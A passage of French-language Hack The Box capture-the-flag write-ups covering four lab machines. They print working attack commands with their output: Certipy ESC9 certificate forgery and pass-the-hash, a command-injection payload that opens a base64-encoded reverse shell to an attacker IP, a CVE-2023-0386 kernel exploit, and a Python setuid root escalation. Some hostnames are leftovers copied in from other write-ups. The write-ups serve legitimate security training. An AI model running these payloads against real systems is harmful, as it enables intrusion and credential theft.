[+] Trying to resolve \u0026#39;DC01.certified.htb\u0026#39; at \u0026#39;10.0.2.3\u0026#39; [!] Failed to resolve: DC01.certified.htb [+] Connecting to DC01.certified.htb:80 [!] Got error while trying to check for web enrollment: [Errno -2] Name or service not known [*] Enumeration output: Certificate Authorities 0 CA Name : certified-DC01-CA DNS Name : DC01.certified.htb Certificate Subject : CN=certified-DC01-CA, DC=certified, DC=htb Certificate Serial Number : 36472F2C180FBB9B4983AD4D60CD5A9D Certificate Validity Start : 2024-05-13 15:33:41+00:00 Certificate Validity End : 2124-05-13 15:43:41+00:00 Web Enrollment : Disabled User Specified SAN : Unknown Request Disposition : Unknown Enforce Encryption for Requests : Unknown Certificate Templates 0 Template Name : CertifiedAuthentication Display Name : Certified Authentication Certificate Authorities : certified-DC01-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : False Certificate Name Flag : SubjectRequireDirectoryPath SubjectAltRequireUpn Enrollment Flag : NoSecurityExtension AutoEnrollment PublishToDs Private Key Flag : 16842752 Extended Key Usage : Server Authentication Client Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 1000 years Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Enrollment Permissions Enrollment Rights : CERTIFIED.HTB\\operator ca CERTIFIED.HTB\\Domain Admins CERTIFIED.HTB\\Enterprise Admins Object Control Permissions Owner : CERTIFIED.HTB\\Administrator Write Owner Principals : CERTIFIED.HTB\\Domain Admins CERTIFIED.HTB\\Enterprise Admins CERTIFIED.HTB\\Administrator Write Dacl Principals : CERTIFIED.HTB\\Domain Admins CERTIFIED.HTB\\Enterprise Admins CERTIFIED.HTB\\Administrator Write Property Principals : CERTIFIED.HTB\\Domain Admins CERTIFIED.HTB\\Enterprise Admins CERTIFIED.HTB\\Administrator [!] Vulnerabilities ESC9 : \u0026#39;CERTIFIED.HTB\\\\operator ca\u0026#39; can enroll and template has no security extension Exploit ESC9 vulnerability #### Modifying the userPrincipalName (UPN) attribute of ca_operator management_svc modifie l’UPN de ca_operator (son identifiant d’utilisateur principal) pour qu’il corresponde à Administrator (sans le domaine @corp.local). L’UPN modifié reste valide car il ne correspond pas exactement à celui d’Administrator (qui est Administrator@corp.local).\n1 2 3 4 5 6 certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Updating user \u0026#39;ca_operator\u0026#39;: userPrincipalName : Administrator [*] Successfully updated \u0026#39;ca_operator\u0026#39; Requesting Certificate management_svc demande un certificat en se faisant passer pour ca_operator, mais avec l’UPN modifié à Administrator. Le modèle de certificat ESC9 (mal configuré) permet d’émettre un certificat sans inclure de sécurité supplémentaire (par exemple, des extensions empêchant les abus). 1 2 3 4 5 6 7 8 9 10 certipy-ad req -username ca_operator@certified.htb -hashes 94994b74f29662fc4d702f2f3b0df327 -ca certified-DC01-CA -template CertifiedAuthentication /usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence \u0026#39;\\(\u0026#39; \u0026#34;(0x[a-zA-Z0-9]+) \\([-]?[0-9]+ \u0026#34;, [*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 23 [*] Got certificate with UPN \u0026#39;Administrator\u0026#39; [*] Certificate has no object SID [*] Saved certificate and private key to \u0026#39;administrator.pfx\u0026#39; Restoring the UPN of ca_operator 1 2 3 4 5 6 7 8 9 10 11 12 certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user \u0026#39;ca_operator\u0026#39; -upn \u0026#39;ca_operator@certified.htb\u0026#39; -debug Certipy v4.8.2 - by Oliver Lyak (ly4k) [+] Trying to resolve \u0026#39;CERTIFIED.HTB\u0026#39; at \u0026#39;10.0.2.3\u0026#39; [+] Resolved \u0026#39;CERTIFIED.HTB\u0026#39; from cache: 10.10.11.41 [+] Authenticating to LDAP server [+] Bound to ldaps://10.10.11.41:636 - ssl [+] Default path: DC=certified,DC=htb [+] Configuration path: CN=Configuration,DC=certified,DC=htb [*] Updating user \u0026#39;ca_operator\u0026#39;: userPrincipalName : ca_operator@certified.htb [*] Successfully updated \u0026#39;ca_operator\u0026#39; Retrieving NT Hash via Forged Certificate Attempting authentication with the issued certificate now yields the NT hash of Administrator@corp.local. The command must include -domain due to the certificate\u0026rsquo;s lack of domain specification:\n1 2 3 4 5 6 7 8 9 certipy-ad auth -pfx ./administrator.pfx -domain certified.htb Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@certified.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to \u0026#39;administrator.ccache\u0026#39; [*] Trying to retrieve NT hash for \u0026#39;administrator\u0026#39; [*] Got hash for \u0026#39;administrator@certified.htb\u0026#39;: aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 evil-winrm -i 10.10.11.41 -u Administrator -H 0d5b49608bbce1751f708748f67e2d34 Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\\Users\\Administrator\\Documents\u0026gt; cd ../Desktop *Evil-WinRM* PS C:\\Users\\Administrator\\Desktop\u0026gt; ls Directory: C:\\Users\\Administrator\\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 12/10/2024 9:26 AM 34 root.txt *Evil-WinRM* PS C:\\Users\\Administrator\\Desktop\u0026gt; cat root.txt dc1c.....fb35 ","date":"2024-12-11T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/certified-htb/","title":"HTB | Certified"},{"content":" Machine name OS IP Difficulty TwoMillion Linux 10.10.11.221 Easy Enumeration nmap 1 2 3 ┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -An -p- 10.10.11.221 Port 80 -\u0026gt; HTTP twomillion.htb /etc/hosts On ajoute les noms de domaines necessaire. Un peu plus tard on découvrira qu\u0026rsquo;il y a également le nom de domaine: data.analytical.htb\n1 2 ## ... 10.10.11.221 twomillion.htb Foothold Invitation code - inviteapi En utilisant Burp sur la page de login, on découvre un code javascript indiquant qu\u0026rsquo;un compte peut etre créer a l\u0026rsquo;aide d\u0026rsquo;un code d\u0026rsquo;Invitation En y découvre un lien vers un code javascript: http://2million.htb/js/inviteapi.min.js\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 eval(function(p, a, c, k, e, d) { e = function(c) { return c.toString(36) }; if (!\u0026#39;\u0026#39;.replace(/^/, String)) { while (c--) { d[c.toString(a)] = k[c] || c.toString(a) } k = [function(e) { return d[e] }]; e = function() { return \u0026#39;\\\\w+\u0026#39; }; c = 1 }; while (c--) { if (k[c]) { p = p.replace(new RegExp(\u0026#39;\\\\b\u0026#39; + e(c) + \u0026#39;\\\\b\u0026#39;, \u0026#39;g\u0026#39;), k[c]) } } return p }(\u0026#39;1 i(4){h 8={\u0026#34;4\u0026#34;:4};$.9({a:\u0026#34;7\u0026#34;,5:\u0026#34;6\u0026#34;,g:8,b:\\\u0026#39;/d/e/n\\\u0026#39;,c:1(0){3.2(0)},f:1(0){3.2(0)}})}1 j(){$.9({a:\u0026#34;7\u0026#34;,5:\u0026#34;6\u0026#34;,b:\\\u0026#39;/d/e/k/l/m\\\u0026#39;,c:1(0){3.2(0)},f:1(0){3.2(0)}})}\u0026#39;, 24, 24, \u0026#39;response|function|log|console|code|dataType|json|POST|formData|ajax|type|url|success|api/v1|invite|error|data|var|verifyInviteCode|makeInviteCode|how|to|generate|verify\u0026#39;.split(\u0026#39;|\u0026#39;), 0, {})) Ce script contient du code obfusqué, qui indique qu\u0026rsquo;une requete POST est possible vers : /api/v1/invite/how/to/generate\nPour génerer un code d\u0026rsquo;invitation\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 function verifyInviteCode(code) { var formData = { \u0026#34;code\u0026#34;: code }; $.ajax({ type: \u0026#34;POST\u0026#34;, dataType: \u0026#34;json\u0026#34;, data: formData, url: \u0026#39;/api/v1/invite/verify\u0026#39;, success: function (response) { console.log(response); }, error: function (response) { console.log(response); } }); } function makeInviteCode() { $.ajax({ type: \u0026#34;POST\u0026#34;, dataType: \u0026#34;json\u0026#34;, url: \u0026#39;/api/v1/invite/how/to/generate\u0026#39;, success: function (response) { console.log(response); }, error: function (response) { console.log(response); } }); } On effectue donc cette requete :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 POST /api/v1/invite/how/to/generate HTTP/1.1 Host: 2million.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;kvl37ft06haubd9f1davp7407bq=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 17 Origin: http://2million.htb Connection: close Referer: http://2million.htb/invite Cookie: PHPSESSID=kvl37ft06haubd9f1davp7407b code=\u0026lt;b\u0026gt;qsdqs\u0026lt;/b\u0026gt; HTTP/1.1 200 OK Server: nginx Date: Fri, 06 Dec 2024 23:44:09 GMT Content-Type: application/json Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 249 {\u0026#34;0\u0026#34;:200,\u0026#34;success\u0026#34;:1,\u0026#34;data\u0026#34;:{\u0026#34;data\u0026#34;:\u0026#34;Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb \\/ncv\\/i1\\/vaivgr\\/trarengr\u0026#34;,\u0026#34;enctype\u0026#34;:\u0026#34;ROT13\u0026#34;},\u0026#34;hint\u0026#34;:\u0026#34;Data is encrypted ... We should probbably check the encryption type in order to decrypt it...\u0026#34;} On y découvre un code chiffré à l\u0026rsquo;aide de ROT13. Grace au site internet dcode.fr on déchiffre le message suivant :\n1 In order to generate the invite code, make a POST request to \\/api\\/v1\\/invite\\/generate On effectue donc cette requête POST sur Burp:\n1 2 3 4 5 6 7 8 POST /api/v1/invite/generate HTTP/1.1 Host: 2million.htb Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 Connection: close Cache-Control: max-age=0 Réponse:\n1 2 3 4 5 6 7 8 9 10 11 12 HTTP/1.1 200 OK Server: nginx Date: Sat, 07 Dec 2024 21:25:53 GMT Content-Type: application/json Connection: close Set-Cookie: PHPSESSID=nvi1ir085vrvc1cuqq22gjoaot; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 91 {\u0026#34;0\u0026#34;:200,\u0026#34;success\u0026#34;:1,\u0026#34;data\u0026#34;:{\u0026#34;code\u0026#34;:\u0026#34;SFE2OVUtMzE1Rk4tUTBUNU0tQko0NU8=\u0026#34;,\u0026#34;format\u0026#34;:\u0026#34;encoded\u0026#34;}} On nous envoie le code en base64, ce qui nous donne:\nHQ69U-315FN-Q0T5M-BJ45O\nOn importe la fonction verifyInviteCode dans la console de firefox qui nous indique que le code est correct\nOn se rend sur la page 2million.htb/invite On s\u0026rsquo;inscrit avec un compte -\u0026gt; hello@hello.hello : hello\nadmin 1 2 3 4 5 6 7 8 9 10 11 GET /api/v1 HTTP/1.1 Host: 2million.htb User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://2million.htb/home/access Cookie: PHPSESSID=dn1g3q7kgl2jj3ondr1sda9gm9 Upgrade-Insecure-Requests: 1 Priority: u=0, i 1 2 3 4 5 6 7 8 9 10 11 HTTP/1.1 200 OK Server: nginx Date: Sat, 07 Dec 2024 22:51:47 GMT Content-Type: application/json Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 800 {\u0026#34;v1\u0026#34;:{\u0026#34;user\u0026#34;:{\u0026#34;GET\u0026#34;:{\u0026#34;\\/api\\/v1\u0026#34;:\u0026#34;Route List\u0026#34;,\u0026#34;\\/api\\/v1\\/invite\\/how\\/to\\/generate\u0026#34;:\u0026#34;Instructions on invite code generation\u0026#34;,\u0026#34;\\/api\\/v1\\/invite\\/generate\u0026#34;:\u0026#34;Generate invite code\u0026#34;,\u0026#34;\\/api\\/v1\\/invite\\/verify\u0026#34;:\u0026#34;Verify invite code\u0026#34;,\u0026#34;\\/api\\/v1\\/user\\/auth\u0026#34;:\u0026#34;Check if user is authenticated\u0026#34;,\u0026#34;\\/api\\/v1\\/user\\/vpn\\/generate\u0026#34;:\u0026#34;Generate a new VPN configuration\u0026#34;,\u0026#34;\\/api\\/v1\\/user\\/vpn\\/regenerate\u0026#34;:\u0026#34;Regenerate VPN configuration\u0026#34;,\u0026#34;\\/api\\/v1\\/user\\/vpn\\/download\u0026#34;:\u0026#34;Download OVPN file\u0026#34;},\u0026#34;POST\u0026#34;:{\u0026#34;\\/api\\/v1\\/user\\/register\u0026#34;:\u0026#34;Register a new user\u0026#34;,\u0026#34;\\/api\\/v1\\/user\\/login\u0026#34;:\u0026#34;Login with existing user\u0026#34;}},\u0026#34;admin\u0026#34;:{\u0026#34;GET\u0026#34;:{\u0026#34;\\/api\\/v1\\/admin\\/auth\u0026#34;:\u0026#34;Check if user is admin\u0026#34;},\u0026#34;POST\u0026#34;:{\u0026#34;\\/api\\/v1\\/admin\\/vpn\\/generate\u0026#34;:\u0026#34;Generate VPN for specific user\u0026#34;},\u0026#34;PUT\u0026#34;:{\u0026#34;\\/api\\/v1\\/admin\\/settings\\/update\u0026#34;:\u0026#34;Update user settings\u0026#34;}}}} On envoie cette requete:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 PUT /api/v1/admin/settings/update HTTP/1.1 Host: 2million.htb User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/json Connection: keep-alive Referer: http://2million.htb/home/access Cookie: PHPSESSID=jg018kgbajmc0pjtrdo4dv603a Upgrade-Insecure-Requests: 1 Priority: u=0, i Content-Length: 52 { \u0026#34;email\u0026#34; : \u0026#34;hello@hello.hello\u0026#34;, \u0026#34;is_admin\u0026#34; : 1 } # REPONSE HTTP/1.1 200 OK Server: nginx Date: Sat, 07 Dec 2024 23:59:01 GMT Content-Type: application/json Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 41 {\u0026#34;id\u0026#34;:22,\u0026#34;username\u0026#34;:\u0026#34;hello\u0026#34;,\u0026#34;is_admin\u0026#34;:1} On peut demander a générer un vpn pour un utilisateur. L\u0026rsquo;utilisateur est injectable, comme on peut voir avec la commande curl ici.\n1 2 3 4 5 6 7 8 9 10 11 12 13 curl -X POST http://2million.htb/api/v1/admin/vpn/generate \\ -H \u0026#34;Host: 2million.htb\u0026#34; \\ -H \u0026#34;User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0\u0026#34; \\ -H \u0026#34;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u0026#34; \\ -H \u0026#34;Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\u0026#34; \\ -H \u0026#34;Accept-Encoding: gzip, deflate, br\u0026#34; \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -H \u0026#34;Connection: keep-alive\u0026#34; \\ -H \u0026#34;Referer: http://2million.htb/home/access\u0026#34; \\ -H \u0026#34;Cookie: PHPSESSID=jg018kgbajmc0pjtrdo4dv603a\u0026#34; \\ -H \u0026#34;Upgrade-Insecure-Requests: 1\u0026#34; \\ --data \u0026#39;{\u0026#34;username\u0026#34;:\u0026#34;admin;whoami;\u0026#34;}\u0026#39; www-data Reverse Shell : www-data 1 2 3 4 5 6 7 8 9 10 11 12 curl -X POST http://2million.htb/api/v1/admin/vpn/generate \\ -H \u0026#34;Host: 2million.htb\u0026#34; \\ -H \u0026#34;User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0\u0026#34; \\ -H \u0026#34;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u0026#34; \\ -H \u0026#34;Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\u0026#34; \\ -H \u0026#34;Accept-Encoding: gzip, deflate, br\u0026#34; \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -H \u0026#34;Connection: keep-alive\u0026#34; \\ -H \u0026#34;Referer: http://2million.htb/home/access\u0026#34; \\ -H \u0026#34;Cookie: PHPSESSID=jg018kgbajmc0pjtrdo4dv603a\u0026#34; \\ -H \u0026#34;Upgrade-Insecure-Requests: 1\u0026#34; \\ --data \u0026#39;{\u0026#34;username\u0026#34;:\u0026#34;admin;echo ZXhwb3J0IFJIT1NUPSIxMC4xMC4xNi41NSI7ZXhwb3J0IFJQT1JUPTkwMDE7cHl0aG9uMyAtYyAnaW1wb3J0IHN5cyxzb2NrZXQsb3MscHR5O3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgob3MuZ2V0ZW52KCJSSE9TVCIpLGludChvcy5nZXRlbnYoIlJQT1JUIikpKSk7W29zLmR1cDIocy5maWxlbm8oKSxmZCkgZm9yIGZkIGluICgwLDEsMildO3B0eS5zcGF3bigic2giKSc= | base64 -d | sh;\u0026#34;}\u0026#39; www-data -\u0026gt; admin .env file : admin credentials En observant les fichiers du site web depuis www-data on observe le fichier **index.php **qui semble recupérer des credentials depuis le fichier .env\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $envFile = file(\u0026#39;.env\u0026#39;); $envVariables = []; foreach ($envFile as $line) { $line = trim($line); if (!empty($line) \u0026amp;\u0026amp; strpos($line, \u0026#39;=\u0026#39;) !== false) { list($key, $value) = explode(\u0026#39;=\u0026#39;, $line, 2); $key = trim($key); $value = trim($value); $envVariables[$key] = $value; } } $dbHost = $envVariables[\u0026#39;DB_HOST\u0026#39;]; $dbName = $envVariables[\u0026#39;DB_DATABASE\u0026#39;]; $dbUser = $envVariables[\u0026#39;DB_USERNAME\u0026#39;]; $dbPass = $envVariables[\u0026#39;DB_PASSWORD\u0026#39;]; En affichant .env, on trouve les credentials admin:\n1 2 3 4 5 $ cat .env DB_HOST=127.0.0.1 DB_DATABASE=htb_prod DB_USERNAME=admin DB_PASSWORD=SuperDuperPass123 On se connecte en ssh a l\u0026rsquo;utilisateur admin:\n1 2 3 4 5 $ ssh admin@2million.htb admin@2million:~$ ls user.txt admin@2million:~$ cat user.txt 1489.....d42e Privilege Escalation Mails : /var/mail/admin Avec linpeas, on observe que admin a des mails à lire dans /var/mail/admin. Ce mail indique qu\u0026rsquo;une vulnérabilité du kernel linux \u0026ldquo;OverlayFS / FUSE\u0026rdquo; semble exploitable.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 cat /var/mail/admin From: ch4p \u0026lt;ch4p@2million.htb\u0026gt; To: admin \u0026lt;admin@2million.htb\u0026gt; Cc: g0blin \u0026lt;g0blin@2million.htb\u0026gt; Subject: Urgent: Patch System OS Date: Tue, 1 June 2023 10:45:22 -0700 Message-ID: \u0026lt;9876543210@2million.htb\u0026gt; X-Mailer: ThunderMail Pro 5.2 Hey admin, I\u0026#39;m know you\u0026#39;re working as fast as you can to do the DB migration. While we\u0026#39;re partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can\u0026#39;t get popped by that. HTB Godfather CVE-2023-0386 : Kernel Exploit Sur internet, on trouve la CVE-2023-0386 avec un repo github\nhttps://github.com/xkaneiki/CVE-2023-0386/tree/main\nOn execute l\u0026rsquo;exploit:\ndans un premier terminal on fait: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 $ make all $ ./fuse ./ovlcap/lower ./gc [+] len of gc: 0x3ee0 mkdir: File exists [+] readdir [+] getattr_callback /file [+] open_callback /file [+] read buf callback offset 0 size 16384 path /file [+] open_callback /file [+] open_callback /file [+] ioctl callback path /file cmd 0x80086601 Dans un deuxième terminal, on execute finalement un deuxième binaire pour obtenir les droits root: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ./exp uid:1000 gid:1000 [+] mount success total 8 drwxrwxr-x 1 root root 4096 Dec 8 12:53 . drwxrwxr-x 6 root root 4096 Dec 8 12:52 .. -rwsrwxrwx 1 nobody nogroup 16096 Jan 1 1970 file [+] exploit success! To run a command as administrator (user \u0026#34;root\u0026#34;), use \u0026#34;sudo \u0026lt;command\u0026gt;\u0026#34;. See \u0026#34;man sudo_root\u0026#34; for details. root@2million:/tmp/t/linux/exploit/CVE-2023-0386# sudo su root@2million:/tmp/t/linux/exploit/CVE-2023-0386# cd /root root@2million:~# cat root.txt 7e64.....db13 CVE-2023-0386 : Explanation A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.\nExploitation :\nUn attaquant crée un environnement spécifique (par exemple, un container ou un espace utilisateur) pour exploiter une mauvaise gestion des droits dans OverlayFS et exécuter du code malveillant avec les privilèges root.\n","date":"2024-12-08T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/twomillion-htb/","title":"HTB | TwoMillion"},{"content":" Machine name OS IP Difficulty Cap Linux 10.10.10.245 Easy Users 1 nathan : Buck3tH4TF0RM3! Enumeration nmap 1 2 3 ┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -An -p- 10.10.10.245 Port 80 : HTTP - http://cap.htb /etc/hosts On ajoute les noms de domaines necessaire. Un peu plus tard on découvrira qu\u0026rsquo;il y a également le nom de domaine: data.analytical.htb\n1 2 ## ... 10.10.10.245 cap.htb Foothold Snapshot On observe un bouton snapshot qui permet visualiser des fichiers de capture reseau .pcap. On observe l\u0026rsquo;url :\nhttp://cap.htb/data/3 On peut download via un bouton, sur Burp on observe un appel a l\u0026rsquo;url: http://cap.htb/download/3\nOn download le plus de pcap possible pour les observer, on peut voir que le numéro 0 est intéressant. Dedans, on découvre la capture de packets réseau montrant une connexion ftp avec un user/password en clair:\n1 2 3 4 220 (vsFTPd 3.0.3) USER nathan 331 Please specify the password. PASS Buck3tH4TF0RM3! FTP - user flag On se connecte avec le user nathan et on récupère le flag utilisateur\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ftp cap.htb Connected to cap.htb. 220 (vsFTPd 3.0.3) Name (cap.htb:leopold): nathan 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp\u0026gt; ls 229 Entering Extended Passive Mode (|||41519|) 150 Here comes the directory listing. -rwxrwxr-x 1 1001 1001 46631 Dec 06 17:17 linenum.sh -r-------- 1 1001 1001 33 Dec 06 13:10 user.txt 226 Directory send OK. ftp\u0026gt; cat user.txt ?Invalid command. ftp\u0026gt; get user.txt local: user.txt remote: user.txt 229 Entering Extended Passive Mode (|||44318|) 150 Opening BINARY mode data connection for user.txt (33 bytes). 100% |***************************************************************************************************************************************************************| 33 608.04 KiB/s 00:00 ETA 226 Transfer complete. 33 bytes received in 00:00 (0.17 KiB/s) Privilege Escalation LinPEAS : Python SUID -\u0026gt; cap_setuid On peut se connecter en ssh avec l\u0026rsquo;utilisateur nathan sur la machine. Ensuite, on trouve une vulnérabilité. Python est autorisé à changer setuid(0) et donc d\u0026rsquo;executer n\u0026rsquo;importe quelle commande en tant que root:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 $ ./linpeas.sh ... Files with capabilities (limited to 50): /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip ... nathan@cap:~/a$ vim please_dont_do_this.py import os ## Changer l\u0026#39;UID en root os.setuid(0) ## Lancer un shell interactif avec les privilèges root os.system(\u0026#34;/bin/bash\u0026#34;) nathan@cap:~/a$ python3 please_dont_do_this.py root@cap:~/a# root@cap:~/a# whoami root root@cap:~# cd /root root@cap:/root# cat root.txt d5d1.....bcf0 ","date":"2024-12-06T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/cap-htb/","title":"HTB | Cap"},{"content":" Machine name OS IP Difficulty Cicada Linux 10.10.11.35 Easy Users 1 2 3 michael.wrightson:`Cicada$M6Corpb*@Lp#nZp!8` david.orelious:`aRt$Lp#7t*VQ!3` emily.oscars:`Q!3@Lp#M6b*7t*Vt` Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 $ nmap 10.10.11.35 -sV -sC -T4 -Pn PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 |_ssl-date: TLS randomness does not represent time Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2024-12-01T07:50:09 |_ start_date: N/A |_clock-skew: 7h00m00s Foothold SMB : HR share On vérifie les Share SMB disponible en se connectant de manière anonyme avec la commande:\nsmbclient -N -L //10.10.11.35\nOn obtient les shares suivant:\n1 2 3 4 5 6 7 8 9 10 Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share DEV Disk HR Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share DEV et HR semblent intéressant ! On va donc vérifier si ils sont accessibles de manière anononyme:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 ## DEV $ smbclient //10.10.11.35/DEV -N smb: \\\u0026gt; ls NET_STATUS_ACCESS_DENIED ## HR $ smbclient //10.10.11.35/HR -N smb: \\\u0026gt; ls . D 0 Thu Mar 14 08:29:09 2024 .. D 0 Thu Mar 14 08:21:29 2024 Notice from HR.txt A 1266 Wed Aug 28 13:31:48 2024 smb: \\\u0026gt; get \u0026#34;Notice from HR.txt\u0026#34; getting file \\Notice from HR.txt of size 1266 as Notice from HR.txt (6.1 KiloBytes/sec) (average 6.1 KiloBytes/sec) On obtient un fichier avec des credentials, notamment un mot de passe: Cicada$M6Corpb*@Lp#nZp!8\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 cat Notice\\ from\\ HR.txt Dear new hire! Welcome to Cicada Corp! We\u0026#39;re thrilled to have you join our team. As part of our security protocols, it\u0026#39;s essential that you change your default password to something unique and secure. Your default password is: Cicada$M6Corpb*@Lp#nZp!8 To change your password: 1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above. 2. Once logged in, navigate to your account settings or profile settings section. 3. Look for the option to change your password. This will be labeled as \u0026#34;Change Password\u0026#34;. 4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters. 5. After changing your password, make sure to save your changes. Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password. If you encounter any issues or need assistance with changing your password, don\u0026#39;t hesitate to reach out to our support team at support@cicada.htb. Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team! Best regards, Cicada Corp User enumeration La prochaine étape est donc de recuperer le nom d\u0026rsquo;utilisateur relié a ce mot de passe. J\u0026rsquo;ai pu tester de très nombreux scripts pour lister les noms d\u0026rsquo;utilisateurs sans avoir de compte. Une seule commande à fonctionné :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 